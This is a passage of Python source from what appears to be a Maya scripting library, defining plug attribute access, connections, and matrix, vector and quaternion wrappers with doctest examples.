>>> nodeB = createNode("transform")
>>> nodeA["tx"] >> nodeB["tx"]
>>> nodeA["tx"] = 5
>>> nodeB["tx"] == 5
True
>>> nodeA["tx"] // nodeB["tx"]
>>> nodeA["tx"] = 0
>>> nodeB["tx"] == 5
True
"""
self.disconnect(other)
def __iter__(self):
"""Iterate over value as a tuple
Example:
>>> node = createNode("transform")
>>> node["translate"] = (0, 1, 2)
>>> for index, axis in enumerate(node["translate"]):
... assert axis == float(index)
... assert isinstance(axis, Plug)
...
>>> a = createNode("transform")
>>> a["myArray"] = Message(array=True)
>>> b = createNode("transform")
>>> c = createNode("transform")
>>> a["myArray"][0] << b["message"]
>>> a["myArray"][1] << c["message"]
>>> a["myArray"][0] in list(a["myArray"])
True
>>> a["myArray"][1] in list(a["myArray"])
True
>>> for single in node["visibility"]:
... print(single)
...
True
>>> node = createNode("wtAddMatrix")
>>> node["wtMatrix"][0]["weightIn"] = 1.0
"""
if self._mplug.isArray:
# getExisting... returns indices currently in use, which is
# important if the given array is *sparse*. That is, if
# indexes 5, 7 and 8 are used. If we simply call
# `evaluateNumElements` then it'll return a single number
# we could use to `range()` from, but that would only work
# if the indices were contiguous.
for index in self._mplug.getExistingArrayAttributeIndices():
yield self[index]
elif self._mplug.isCompound:
for index in range(self._mplug.numChildren()):
yield self[index]
else:
values = self.read()
# Facilitate single-value attributes
values = values if isinstance(values, (tuple, list)) else [values]
for value in values:
yield value
def __getitem__(self, index):
"""Read from child of array or compound plug
Arguments:
index (int): Logical index of plug (NOT physical, make note)
Example:
>>> _ = cmds.file(new=True, force=True)
>>> node = createNode("transform", name="mynode")
>>> node["translate"][0].read()
0.0
>>> node["visibility"][0]
Traceback (most recent call last):
...
TypeError: |mynode.visibility does not support indexing
>>> node["translate"][2] = 5.1
>>> node["translate"][2].read()
5.1
"""
cls = self.__class__
if isinstance(index, int):
# Support backwards-indexing
if index < 0:
index = self.count() - abs(index)
if self._mplug.isArray:
item = self._mplug.elementByLogicalIndex(index)
return cls(self._node, item, self._unit)
elif self._mplug.isCompound:
item = self._mplug.child(index)
return cls(self._node, item, self._unit)
else:
raise TypeError(
"%s does not support indexing" % self.path()
)
elif isinstance(index, string_types):
# Compound attributes have no equivalent
# to "MDependencyNode.findPlug()" and must
# be searched by hand.
if self._mplug.isCompound:
for child in range(self._mplug.numChildren()):
child = self._mplug.child(child)
_, name = child.name().rsplit(".", 1)
if index == name:
return cls(self._node, child)
else:
raise TypeError("'%s' is not a compound attribute"
% self.path())
raise ExistError("'%s' was not found" % index)
def __setitem__(self, index, value):
"""Write to child of array or compound plug
Example:
>>> node = createNode("transform")
>>> node["translate"][0] = 5
>>> node["tx"]
5.0
"""
self[index].write(value)
def __init__(self, node, mplug, unit=None, key=None, modifier=None):
"""A Maya plug
Arguments:
node (Node): Parent Node of plug
mplug (maya.api.OpenMaya.MPlug): Internal Maya plug
unit (int, optional): Unit with which to read plug
"""
assert isinstance(node, Node), "%s is not a Node" % node
self._node = node
self._mplug = mplug
self._unit = unit
self._cached = None
self._key = key
self._modifier = modifier
def plug(self):
return self._mplug
@property
def isArray(self):
return self._mplug.isArray
@property
def isCompound(self):
return self._mplug.isCompound
def append(self, value):
"""Add `value` to end of self, which is an array
Arguments:
value (object): If value, create a new entry and append it.
If cmdx.Plug, create a new entry and connect it.
Example:
>>> _ = cmds.file(new=True, force=True)
>>> node = createNode("transform", name="appendTest")
>>> node["myArray"] = Double(array=True)
>>> node["myArray"].append(1.0)
>>> node["notArray"] = Double()
>>> node["notArray"].append(2.0)
Traceback (most recent call last):
...
TypeError: "|appendTest.notArray" was not an array attribute
"""
if not self._mplug.isArray:
raise TypeError("\"%s\" was not an array attribute" % self.path())
index = self.count()
if isinstance(value, Plug):
self[index] << value
else:
self[index].write(value)
def extend(self, values):
"""Append multiple values to the end of an array
Arguments:
values (tuple): If values, create a new entry and append it.
If cmdx.Plug's, create a new entry and connect it.
Example:
>>> node = createNode("transform")
>>> node["myArray"] = Double(array=True)
>>> node["myArray"].extend([1.0, 2.0, 3.0])
>>> node["myArray"][0]
1.0
>>> node["myArray"][-1]
3.0
"""
for value in values:
self.append(value)
def count(self):
return self._mplug.evaluateNumElements()
def asDouble(self, time=None):
"""Return plug as double (Python float)
Example:
>>> node = createNode("transform")
>>> node["translateX"] = 5.0
>>> node["translateX"].asDouble()
5.0
"""
if time is not None:
return self._mplug.asDouble(DGContext(time=time))
return self._mplug.asDouble()
def asMatrix(self, time=None):
"""Return plug as MatrixType
Example:
>>> node1 = createNode("transform")
>>> node2 = createNode("transform", parent=node1)
>>> node1["translate"] = (0, 5, 0)
>>> node2["translate"] = (0, 5, 0)
>>> plug1 = node1["matrix"]
>>> plug2 = node2["worldMatrix"][0]
>>> mat1 = plug1.asMatrix()
>>> mat2 = plug2.asMatrix()
>>> mat = mat1 * mat2
>>> tm = TransformationMatrix(mat)
>>> list(tm.translation())
[0.0, 15.0, 0.0]
"""
if time is not None:
context = DGContext(time=time)
obj = self._mplug.asMObject(context)
else:
obj = self._mplug.asMObject()
return om.MFnMatrixData(obj).matrix()
def asTransformationMatrix(self, time=None):
"""Return plug as TransformationMatrix
Example:
>>> node = createNode("transform")
>>> node["translateY"] = 12
>>> node["rotate"] = 1
>>> tm = node["matrix"].asTm()
>>> map(round, tm.rotation())
[1.0, 1.0, 1.0]
>>> list(tm.translation())
[0.0, 12.0, 0.0]
"""
return TransformationMatrix(self.asMatrix(time))
# Alias
asTm = asTransformationMatrix
def asEulerRotation(self, order=kXYZ, time=None):
value = self.read(time=time)
return om.MEulerRotation(value, order)
def asQuaternion(self, time=None):
value = self.read(time=time)
value = Euler(value).asQuaternion()
def asVector(self, time=None):
assert self.isArray or self.isCompound, "'%s' not an array" % self
return Vector(self.read(time=time))
@property
def connected(self):
"""Return whether or not this attribute is connected (to anything)"""
return self.connection() is not None
@property
def locked(self):
return self._mplug.isLocked
@locked.setter
def locked(self, value):
"""Lock attribute"""
elements = (
self
if self.isArray or self.isCompound
else [self]
)
# Use setAttr in place of MPlug.isKeyable = False, as that
# doesn't persist the scene on save if the attribute is dynamic.
for el in elements:
cmds.setAttr(el.path(), lock=value)
def lock(self):
self.locked = True
def unlock(self):
self.locked = False
@property
def channelBox(self):
"""Is the attribute visible in the Channel Box?"""
if self.isArray or self.isCompound:
return all(
plug._mplug.isChannelBox
for plug in self
)
else:
return self._mplug.isChannelBox
@channelBox.setter
def channelBox(self, value):
elements = (
self
if self.isArray or self.isCompound
else [self]
)
# Use setAttr in place of MPlug.isChannelBox = False, as that
# doesn't persist the scene on save if the attribute is dynamic.
for el in elements:
cmds.setAttr(el.path(), keyable=value, channelBox=value)
@property
def keyable(self):
"""Is the attribute keyable?"""
if self.isArray or self.isCompound:
return all(
plug._mplug.isKeyable
for plug in self
)
else:
return self._mplug.isKeyable
@keyable.setter
def keyable(self, value):
elements = (
self
if self.isArray or self.isCompound
else [self]
)
# Use setAttr in place of MPlug.isKeyable = False, as that
# doesn't persist the scene on save if the attribute is dynamic.
for el in elements:
cmds.setAttr(el.path(), keyable=value)
@property
def hidden(self):
return om.MFnAttribute(self._mplug.attribute()).hidden
@hidden.setter
def hidden(self, value):
pass
def hide(self):
"""Hide attribute from channel box
Note: An attribute cannot be hidden from the channel box
and keyable at the same time. Therefore, this method
also makes the attribute non-keyable.
Supports array and compound attributes too.
"""
self.keyable = False
self.channelBox = False
def lockAndHide(self):
self.lock()
self.hide()
@property
def default(self):
"""Return default value of plug"""
return _plug_to_default(self._mplug)
def reset(self):
"""Restore plug to default value"""
if self.writable:
self.write(self.default)
else:
raise TypeError(
"Cannot reset non-writable attribute '%s'" % self.path()
)
@property
def writable(self):
"""Can the user write to this attribute?
Convenience for combined call to `plug.connected`
and `plug.locked`.
Example:
>> if node["translateX"].writable:
.. node["translateX"] = 5
"""
return not any([self.connected, self.locked])
def show(self):
"""Show attribute in channel box
Note: An attribute can be both visible in the channel box
and non-keyable, therefore, unlike :func:`hide()`, this
method does not alter the keyable state of the attribute.
"""
self.channelBox = True
def type(self):
"""Retrieve API type of plug as string
Example:
>>> node = createNode("transform")
>>> node["translate"].type()
'kAttribute3Double'
>>> node["translateX"].type()
'kDoubleLinearAttribute'
"""
return self._mplug.attribute().apiTypeStr
def path(self):
return "%s.%s" % (
self._node.path(), self._mplug.partialName(
includeNodeName=False,
useLongNames=True,
useFullAttributePath=True
)
)
def name(self, long=False):
return self._mplug.partialName(
includeNodeName=False,
useLongNames=long,
useFullAttributePath=True
)
def read(self, unit=None, time=None):
"""Read attribute value
Arguments:
unit (int, optional): Unit with which to read plug
time (float, optional): Time at which to read plug
Example:
>>> node = createNode("transform")
>>> node["ty"] = 100.0
>>> node["ty"].read()
100.0
>>> node["ty"].read(unit=Meters)
1.0
"""
unit = unit if unit is not None else self._unit
context = None if time is None else DGContext(time=time)
try:
value = _plug_to_python(
self._mplug,
unit=unit,
context=context
)
# Store cached value
self._node._state["values"][self._key, unit] = value
return value
except RuntimeError:
raise
except TypeError:
# Expected errors
log.error("'%s': failed to read attribute" % self.path())
raise
def write(self, value):
if not getattr(self._modifier, "isDone", True):
return self._modifier.setAttr(self, value)
try:
_python_to_plug(value, self)
self._cached = value
except RuntimeError:
raise
except TypeError:
log.error("'%s': failed to write attribute" % self.path())
raise
def connect(self, other, force=True):
if not getattr(self._modifier, "isDone", True):
return self._modifier.connect(self, other, force)
mod = om.MDGModifier()
if force:
# Disconnect any plug connected to `other`
for plug in other._mplug.connectedTo(True, False):
mod.disconnect(plug, other._mplug)
mod.connect(self._mplug, other._mplug)
mod.doIt()
def disconnect(self, other=None, source=True, destination=True):
"""Disconnect self from `other`
Arguments:
other (Plug, optional): If none is provided, disconnect everything
Example:
>>> node1 = createNode("transform")
>>> node2 = createNode("transform")
>>> node2["tx"].connection() is None
True
>>> node2["ty"].connection() is None
True
>>>
>>> node2["tx"] << node1["tx"]
>>> node2["ty"] << node1["ty"]
>>> node2["ty"].connection() is None
False
>>> node2["tx"].connection() is None
False
>>>
>>> node2["tx"].disconnect(node1["tx"])
>>> node2["ty"].disconnect()
>>> node2["tx"].connection() is None
True
>>> node2["ty"].connection() is None
True
"""
other = getattr(other, "_mplug", None)
if not getattr(self._modifier, "isDone", True):
mod = self._modifier
mod.disconnect(self._mplug, other, source, destination)
# Don't do it, leave that to the parent context
else:
mod = DGModifier()
mod.disconnect(self._mplug, other, source, destination)
mod.doIt()
def connections(self,
type=None,
source=True,
destination=True,
plugs=False,
unit=None):
"""Yield plugs connected to self
Arguments:
type (int, optional): Only return nodes of this type
source (bool, optional): Return source plugs,
default is True
destination (bool, optional): Return destination plugs,
default is True
plugs (bool, optional): Return connected plugs instead of nodes
unit (int, optional): Return plug in this unit, e.g. Meters
Example:
>>> _ = cmds.file(new=True, force=True)
>>> a = createNode("transform", name="A")
>>> b = createNode("multDoubleLinear", name="B")
>>> a["ihi"] << b["ihi"]
>>> a["ihi"].connection() == b
True
>>> b["ihi"].connection() == a
True
>>> a["ihi"]
2
"""
op = operator.eq
other = "typeId"
if isinstance(type, string_types):
other = "typeName"
if isinstance(type, (tuple, list)):
op = operator.contains
for plug in self._mplug.connectedTo(source, destination):
mobject = plug.node()
node = Node(mobject)
if not type or op(type, getattr(node._fn, other)):
yield Plug(node, plug, unit) if plugs else node
def connection(self,
type=None,
source=True,
destination=True,
plug=False,
unit=None):
"""Return first connection from :func:`connections()`"""
return next(self.connections(type=type,
source=source,
destination=destination,
plugs=plug,
unit=unit), None)
def source(self, unit=None):
cls = self.__class__
plug = self._mplug.source()
node = Node(plug.node())
if not plug.isNull:
return cls(node, plug, unit)
def node(self):
return self._node
if ENABLE_PEP8:
as_double = asDouble
as_matrix = asMatrix
as_transformation_matrix = asTransformationMatrix
as_euler_rotation = asEulerRotation
as_quaternion = asQuaternion
as_vector = asVector
channel_box = channelBox
lock_and_hide = lockAndHide
class TransformationMatrix(om.MTransformationMatrix):
"""A more readable version of Maya's MTransformationMatrix
Added:
- Takes tuples/lists in place of MVector and other native types
- Support for multiplication
- Support for getting individual axes
- Support for direct access to the quaternion
Arguments:
matrix (Matrix, TransformationMatrix, optional): Original constructor
translate (tuple, Vector, optional): Initial translate value
rotate (tuple, Vector, optional): Initial rotate value
scale (tuple, Vector, optional): Initial scale value
"""
def __init__(self, matrix=None, translate=None, rotate=None, scale=None):
# It doesn't like being handed `None`
args = [matrix] if matrix is not None else []
super(TransformationMatrix, self).__init__(*args)
if translate is not None:
self.setTranslation(translate)
if rotate is not None:
self.setRotation(rotate)
if scale is not None:
self.setScale(scale)
def __mul__(self, other):
if isinstance(other, (tuple, list)):
other = Vector(*other)
if isinstance(other, om.MVector):
p = self.translation()
q = self.quaternion()
return p + q * other
elif isinstance(other, om.MMatrix):
return type(self)(self.asMatrix() * other)
elif isinstance(other, om.MTransformationMatrix):
return type(self)(self.asMatrix() * other.asMatrix())
else:
raise TypeError(
"unsupported operand type(s) for *: '%s' and '%s'"
% (type(self).__name__, type(other).__name__)
)
@property
def xAxis(self):
return self.quaternion() * Vector(1, 0, 0)
@property
def yAxis(self):
return self.quaternion() * Vector(0, 1, 0)
@property
def zAxis(self):
return self.quaternion() * Vector(0, 0, 1)
def translateBy(self, vec, space=None):
space = space or sTransform
if isinstance(vec, (tuple, list)):
vec = Vector(vec)
return super(TransformationMatrix, self).translateBy(vec, space)
def rotateBy(self, rot, space=None):
"""Handle arguments conveniently
- Allow for optional `space` argument
- Automatically convert tuple to Vector
Arguments:
rot (Vector, Quaternion): Rotation to add
"""
space = space or sTransform
if isinstance(rot, (tuple, list)):
rot = Vector(rot)
if isinstance(rot, om.MVector):
rot = EulerRotation(rot)
return super(TransformationMatrix, self).rotateBy(rot, space)
def quaternion(self):
"""Return transformation matrix as a Quaternion"""
return Quaternion(self.rotation(asQuaternion=True))
def rotatePivot(self, space=None):
"""This method does not typically support optional arguments"""
space = space or sTransform
return super(TransformationMatrix, self).rotatePivot(space)
def translation(self, space=None):
"""This method does not typically support optional arguments"""
space = space or sTransform
return super(TransformationMatrix, self).translation(space)
def setTranslation(self, trans, space=None):
if isinstance(trans, Plug):
trans = trans.as_vector()
if isinstance(trans, (tuple, list)):
trans = Vector(*trans)
space = space or sTransform
return super(TransformationMatrix, self).setTranslation(trans, space)
def scaleBy(self, space=None):
"""This method does not typically support optional arguments"""
space = space or sTransform
return Vector(super(TransformationMatrix, self).scale(space))
def setScale(self, seq, space=None):
"""This method does not typically support optional arguments"""
if isinstance(seq, Plug):
seq = seq.as_vector()
if isinstance(seq, (tuple, list)):
seq = Vector(*seq)
space = space or sTransform
return super(TransformationMatrix, self).setScale(seq, space)
def rotation(self, asQuaternion=False):
return super(TransformationMatrix, self).rotation(asQuaternion)
def setRotation(self, rot):
"""Interpret three values as an euler rotation"""
if isinstance(rot, Plug):
rot = rot.as_vector()
if isinstance(rot, (tuple, list)):
try:
rot = Vector(rot)
except ValueError:
traceback.print_exc()
raise ValueError(
"I tried automatically converting your "
"tuple to a Vector, but couldn't.."
)
if isinstance(rot, Vector):
rot = EulerRotation(rot)
return super(TransformationMatrix, self).setRotation(rot)
def asMatrix(self):
return MatrixType(super(TransformationMatrix, self).asMatrix())
def asMatrixInverse(self):
return MatrixType(super(TransformationMatrix, self).asMatrixInverse())
# A more intuitive alternative
translate = translateBy
rotate = rotateBy
scale = scaleBy
if ENABLE_PEP8:
x_axis = xAxis
y_axis = yAxis
z_axis = zAxis
translate_by = translateBy
rotate_by = rotateBy
set_translation = setTranslation
set_rotation = setRotation
set_scale = setScale
as_matrix = asMatrix
as_matrix_inverse = asMatrixInverse
class MatrixType(om.MMatrix):
def __call__(self, *item):
"""Native API 2.0 MMatrix does not support indexing
API 1.0 however *does*, except only for elements
and not rows. Screw both of those, indexing isn't hard.
Arguments:
item (int, tuple): 1 integer for row, 2 for element
Identity/default matrix:
[[1.0, 0.0, 0.0, 0.0]]
[[0.0, 1.0, 0.0, 0.0]]
[[0.0, 0.0, 1.0, 0.0]]
[[0.0, 0.0, 0.0, 1.0]]
Example:
>>> m = MatrixType()
>>> m(0, 0)
1.0
>>> m(0, 1)
0.0
>>> m(1, 1)
1.0
>>> m(2, 1)
0.0
>>> m(3, 3)
1.0
>>>
>>> m(0)
(1.0, 0.0, 0.0, 0.0)
"""
if len(item) == 1:
return self.row(*item)
elif len(item) == 2:
return self.element(*item)
else:
raise ValueError(
"Must provide either 1 or 2 coordinates, "
"for row and element respectively"
)
def __mul__(self, other):
return type(self)(super(MatrixType, self).__mul__(other))
def __div__(self, other):
return type(self)(super(MatrixType, self).__div__(other))
def inverse(self):
return type(self)(super(MatrixType, self).inverse())
def row(self, index):
values = tuple(self)
return (
values[index * 4 + 0],
values[index * 4 + 1],
values[index * 4 + 2],
values[index * 4 + 3]
)
def element(self, row, col):
values = tuple(self)
return values[row * 4 + col % 4]
# Alias
Transformation = TransformationMatrix
Tm = TransformationMatrix
Mat = MatrixType
Mat4 = MatrixType
Matrix4 = MatrixType
class Vector(om.MVector):
"""Maya's MVector
Example:
>>> vec = Vector(1, 0, 0)
>>> vec * Vector(0, 1, 0) # Dot product
0.0
>>> vec ^ Vector(0, 1, 0) # Cross product
maya.api.OpenMaya.MVector(0, 0, 1)
"""
def __add__(self, value):
if isinstance(value, (int, float)):
return type(self)(
self.x + value,
self.y + value,
self.z + value,
)
return super(Vector, self).__add__(value)
def __iadd__(self, value):
if isinstance(value, (int, float)):
return type(self)(
self.x + value,
self.y + value,
self.z + value,
)
return super(Vector, self).__iadd__(value)
# Alias, it can't take anything other than values
# and yet it isn't explicit in its name.
Vector3 = Vector
class Point(om.MPoint):
"""Maya's MPoint"""
class BoundingBox(om.MBoundingBox):
"""Maya's MBoundingBox"""
def volume(self):
return self.width * self.height * self.depth
class Quaternion(om.MQuaternion):
"""Maya's MQuaternion
Example:
>>> q = Quaternion(0, 0, 0, 1)
>>> v = Vector(1, 2, 3)
>>> isinstance(q * v, Vector)
True
"""
def __mul__(self, other):
if isinstance(other, (tuple, list)):
other = Vector(*other)
if isinstance(other, om.MVector):
return Vector(other.rotateBy(self))
else:
return super(Quaternion, self).__mul__(other)
def lengthSquared(self):
return (
self.x * self.x +
self.y * self.y +
self.z * self.z +
self.w * self.w
)
def length(self):
return math.sqrt(self.lengthSquared())
def isNormalised(self, tol=0.0001):
return abs(self.length() - 1.0) < tol
# Alias
Quat = Quaternion
def twistSwingToQuaternion(ts):
"""Convert twist/swing1/swing2 rotation in a Vector into a quaternion
Arguments:
ts (Vector): Twist, swing1 and swing2
"""
t = tan(ts.x * 0.25)
s1 = tan(ts.y * 0.25)
s2 = tan(ts.z * 0.25)
b = 2.0 / (1.0 + s1 * s1 + s2 * s2)
c = 2.0 / (1.0 + t * t)
quat = Quaternion()
quat.w = (b - 1.0) * (c - 1.0)
quat.x = -t * (b - 1.0) * c
quat.y = -b * (c * t * s1 + (c - 1.0) * s2)
quat.z = -b * (c * t * s2 - (c - 1.0) * s1)
assert quat.isNormalised()
return quat
class EulerRotation(om.MEulerRotation):
def asQuaternion(self):
return super(EulerRotation, self).asQuaternion()
if ENABLE_PEP8:
as_quaternion = asQuaternion
# Alias
Euler = EulerRotation
def NurbsCurveData(points, degree=1, form=om1.MFnNurbsCurve.kOpen):
"""Tuple of points to MObject suitable for nurbsCurve-typed data
Arguments:
points (tuple): (x, y, z) tuples per point
degree (int, optional): Defaults to 1 for linear
form (int, optional): Defaults to MFnNurbsCurve.kOpen,
also available kClosed
Example:
Create a new nurbs curve like this.
>>> data = NurbsCurveData(
... points=(
... (0, 0, 0),
... (0, 1, 0),
... (0, 2, 0),
... ))
...
>>> parent = createNode("transform")
>>> shape = createNode("nurbsCurve", parent=parent)
>>> shape["cached"] = data
"""
degree = min(3, max(1, degree))
cvs = om1.MPointArray()
curveFn = om1.MFnNurbsCurve()
data = om1.MFnNurbsCurveData()
mobj = data.create()
for point in points:
cvs.append(om1.MPoint(*point))
curveFn.createWithEditPoints(cvs,
degree,
form,
False,
False,
True,
mobj)
return mobj
class CachedPlug(Plug):
"""Returned in place of an actual plug"""
def __init__(self, value):
self._value = value
def read(self):
return self._value
def _plug_to_default(plug):
"""Find default value from plug, regardless of attribute type"""
if plug.isArray:
raise TypeError("Array plugs are unsupported")
if plug.isCompound:
raise TypeError("Compound plugs are unsupported")
attr = plug.attribute()
type = attr.apiType()
if type == om.MFn.kTypedAttribute:
return om.MFnTypedAttribute(attr).default
elif type in (om.MFn.kDoubleLinearAttribute,
om.MFn.kFloatLinearAttribute,
om.MFn.kDoubleAngleAttribute,
om.MFn.kFloatAngleAttribute):
return om.MFnUnitAttribute(attr).default
elif type == om.MFn.kNumericAttribute:
return om.MFnNumericAttribute(attr).default
elif type == om.MFn.kEnumAttribute:
return om.MFnEnumAttribute(attr).default
else:
raise TypeError("Attribute type '%s' unsupported" % type)
def _plug_to_python(plug, unit=None, context=None):
"""Convert native `plug` to Python type
Arguments:
plug (om.MPlug): Native Maya plug
unit (int, optional): Return value in this unit, e.g. Meters
context (om.MDGContext, optional): Return value in this context
"""
assert not plug.isNull, "'%s' was null" % plug
kwargs = dict()
if context is not None:
kwargs["context"] = context
# Multi attributes
# _____
# | |
# | ||
# | ||
# |_____||
# |_____|
#
if plug.isArray and plug.isCompound:
# E.g. locator["worldPosition"]
return _plug_to_python(
plug.elementByLogicalIndex(0), unit, context
)
elif plug.isArray:
# E.g. transform["worldMatrix"][0]
# E.g. locator["worldPosition"][0]
return tuple(
_plug_to_python(
plug.elementByLogicalIndex(index),
unit,
context
)
for index in range(plug.evaluateNumElements())
)
elif plug.isCompound:
return tuple(
_plug_to_python(plug.child(index), unit, context)
for index in range(plug.numChildren())
)
# Simple attributes
# _____
# | |
# | |
# | |
# |_____|
#
attr = plug.attribute()
type = attr.apiType()
if type == om.MFn.kTypedAttribute:
innerType = om.MFnTypedAttribute(attr).attrType()
if innerType == om.MFnData.kAny:
# E.g. choice["input"][0]
return None
elif innerType == om.MFnData.kMatrix:
# E.g. transform["worldMatrix"][0]
if plug.isArray:
plug = plug.elementByLogicalIndex(0)
return tuple(
om.MFnMatrixData(plug.asMObject(**kwargs)).matrix()
)
elif innerType == om.MFnData.kString:
return plug.asString(**kwargs)
elif innerType == om.MFnData.kNurbsCurve:
return om.MFnNurbsCurveData(plug.asMObject(**kwargs))
elif innerType == om.MFnData.kComponentList:
return None
elif innerType == om.MFnData.kInvalid:
# E.g. time1.timewarpIn_Hidden
# Unsure of why some attributes are invalid
return None
else:
log.debug("Unsupported kTypedAttribute: %s" % innerType)
return None
elif type == om.MFn.kMatrixAttribute:
return tuple(om.MFnMatrixData(plug.asMObject(**kwargs)).matrix())
elif type == om.MFnData.kDoubleArray:
raise TypeError("%s: kDoubleArray is not supported" % plug)
elif type in (om.MFn.kDoubleLinearAttribute,
om.MFn.kFloatLinearAttribute):
if unit is None:
return plug.asMDistance(**kwargs).asUnits(Centimeters)
elif unit == Millimeters:
return plug.asMDistance(**kwargs).asMillimeters()
elif unit == Centimeters:
return plug.asMDistance(**kwargs).asCentimeters()
elif unit == Meters:
return plug.asMDistance(**kwargs).asMeters()
elif unit == Kilometers:
return plug.asMDistance(**kwargs).asKilometers()
elif unit == Inches:
return plug.asMDistance(**kwargs).asInches()
elif unit == Feet:
return plug.asMDistance(**kwargs).asFeet()
elif unit == Miles:
return plug.asMDistance(**kwargs).asMiles()
elif unit == Yards:
return plug.asMDistance(**kwargs).asYards()
else:
raise TypeError("Unsupported unit '%d'" % unit)
elif type in (om.MFn.kDoubleAngleAttribute,
om.MFn.kFloatAngleAttribute):
if unit is None:
return plug.asMAngle(**kwargs).asUnits(Radians)
elif unit == Degrees:
return plug.asMAngle(**kwargs).asDegrees()
elif unit == Radians:
return plug.asMAngle(**kwargs).asRadians()
elif unit == AngularSeconds:
return plug.asMAngle(**kwargs).asAngSeconds()
elif unit == AngularMinutes:
return plug.asMAngle(**kwargs).asAngMinutes()
else:
raise TypeError("Unsupported unit '%d'" % unit)
# Number
elif type == om.MFn.kNumericAttribute:
innerType = om.MFnNumericAttribute(attr).numericType()
if innerType == om.MFnNumericData.kBoolean:
return plug.asBool(**kwargs)
elif innerType in (om.MFnNumericData.kShort,
om.MFnNumericData.kInt,
om.MFnNumericData.kLong,
om.MFnNumericData.kByte):
return plug.asInt(**kwargs)
elif innerType in (om.MFnNumericData.kFloat,
om.MFnNumericData.kDouble,
om.MFnNumericData.kAddr):
return plug.asDouble(**kwargs)
else:
raise TypeError("Unsupported numeric type: %s"
% innerType)
# Enum
elif type == om.MFn.kEnumAttribute:
return plug.asShort(**kwargs)
elif type == om.MFn.kMessageAttribute:
# In order to comply with `if plug:`
return True
elif type == om.MFn.kTimeAttribute:
if unit:
return plug.asMTime(**kwargs).asUnits(unit)
else:
return plug.asMTime(**kwargs).value
elif type == om.MFn.kInvalid:
raise TypeError("%s was invalid" % plug.name())
else:
raise TypeError("Unsupported type '%s'" % type)
def _python_to_plug(value, plug):
"""Pass value of `value` to `plug`
Arguments:
value (any): Instance of Python or Maya type
plug (Plug): Target plug to which value is applied
"""
# Compound values
if isinstance(value, (tuple, list)):
if plug.type() == "kMatrixAttribute":
assert len(value) == 16, "Value didn't appear to be a valid matrix"
return _python_to_plug(Matrix4(value), plug)
for index, value in enumerate(value):
# Tuple values are assumed flat:
# e.g. (0, 0, 0, 0)
# Nested values are not supported:
# e.g. ((0, 0), (0, 0))
# Those can sometimes appear in e.g. matrices
if isinstance(value, (tuple, list)):
raise TypeError(
"Unsupported nested Python type: %s"
% value.__class__
)
_python_to_plug(value, plug[index])
# Native Maya types
elif isinstance(value, om1.MObject):
node = _encode1(plug._node.path())
shapeFn = om1.MFnDagNode(node)
plug = shapeFn.findPlug(plug.name())
plug.setMObject(value)
elif isinstance(value, om.MEulerRotation):
for index, value in enumerate(value):
value = om.MAngle(value, om.MAngle.kRadians)
_python_to_plug(value, plug[index])
elif isinstance(value, om.MAngle):
plug._mplug.setMAngle(value)
elif isinstance(value, om.MDistance):
plug._mplug.setMDistance(value)
elif isinstance(value, om.MTime):
plug._mplug.setMTime(value)
elif isinstance(value, om.MQuaternion):
_python_to_plug(value.asEulerRotation(), plug)
elif isinstance(value, om.MVector):
for index, value in enumerate(value):
_python_to_plug(value, plug[index])
elif isinstance(value, om.MPoint):
for index, value in enumerate(value):
_python_to_plug(value, plug[index])
elif isinstance(value, om.MMatrix):
matrixData = om.MFnMatrixData()
matobj = matrixData.create(value)
plug._mplug.setMObject(matobj)
elif plug._mplug.isCompound:
count = plug._mplug.numChildren()
return _python_to_plug([value] * count, plug)
# Native Python types
elif isinstance(value, string_types):
plug._mplug.setString(value)
elif isinstance(value, int):
plug._mplug.setInt(value)
elif isinstance(value, float):
plug._mplug.setDouble(value)
elif isinstance(value, bool):
plug._mplug.setBool(value)
else:
raise TypeError("Unsupported Python type '%s'" % value.__class__)
def _python_to_mod(value, plug, mod):
"""Convert `value` into a suitable equivalent for om.MDGModifier
Arguments:
value (object): Value of any type to write into modifier
plug (Plug): Plug within which to write value
mod (om.MDGModifier): Modifier to use for writing it
"""
mplug = plug._mplug
if isinstance(value, (tuple, list)):
for index, value in enumerate(value):
# Tuple values are assumed flat:
# e.g. (0, 0, 0, 0)
# Nested values are not supported:
# e.g. ((0, 0), (0, 0))
# Those can sometimes appear in e.g. matrices
if isinstance(value, (tuple, list)):
raise TypeError(
"Unsupported nested Python type: %s"
% value.__class__
)
_python_to_mod(value, plug[index], mod)
elif isinstance(value, om.MVector):
for index, value in enumerate(value):
_python_to_mod(value, plug[index], mod)
elif isinstance(value, string_types):
mod.newPlugValueString(mplug, value)
elif isinstance(value, int):
mod.newPlugValueInt(mplug, value)
elif isinstance(value, float):
mod.newPlugValueFloat(mplug, value)
elif isinstance(value, bool):
mod.newPlugValueBool(mplug, value)
elif isinstance(value, om.MAngle):
mod.newPlugValueMAngle(mplug, value)
elif isinstance(value, om.MDistance):
mod.newPlugValueMDistance(mplug, value)
elif isinstance(value, om.MTime):
mod.newPlugValueMTime(mplug, value)
elif isinstance(value, om.MEulerRotation):
for index, value in enumerate(value):
value = om.MAngle(value, om.MAngle.kRadians)
_python_to_mod(value, plug[index], mod)
else:
log.warning(
"Unsupported plug type for modifier: %s" % type(value)
)
return False
return True
def encode(path):
"""Convert relative or absolute `path` to cmdx Node
Fastest conversion from absolute path to Node
Arguments:
path (str): Absolute or relative path to DAG or DG node
"""
assert isinstance(path, string_types), "%s was not string" % path
selectionList = om.MSelectionList()
try:
selectionList.add(path)
except RuntimeError:
raise ExistError("'%s' does not exist" % path)
mobj = selectionList.getDependNode(0)
return Node(mobj)
def fromHash(code, default=None):
"""Get existing node from MObjectHandle.hashCode()"""
try:
return Singleton._instances["%x" % code]
except KeyError:
return default
def fromHex(hex, default=None, safe=True):
"""Get existing node from Node.hex"""
node = Singleton._instances.get(hex, default)
if safe and node and node.exists:
return node
else:
return node
def toHash(mobj):
"""Cache the given `mobj` and return its hashCode
This enables pre-caching of one or more nodes in situations where
intend to access it later, at a more performance-critical moment.
Ignores nodes that have already been cached.
"""
node = Node(mobj)
return node.hashCode
def toHex(mobj):
"""Cache the given `mobj` and return its hex value
See :func:`toHash` for docstring.
"""
node = Node(mobj)
return node.hex
def asHash(mobj):
"""Return a given hashCode for `mobj`, without caching it
This can be helpful in case you wish to synchronise `cmdx`
with a third-party library or tool and wish to guarantee
that an identical algorithm is used.
"""
handle = om.MObjectHandle(mobj)
return handle.hashCode()
def asHex(mobj):
"""Return a given hex string for `mobj`, without caching it
See docstring for :func:`asHash` for details
"""
return "%x" % asHash(mobj)
if ENABLE_PEP8:
from_hash = fromHash
from_hex = fromHex
to_hash = toHash
to_hex = toHex
as_hash = asHash
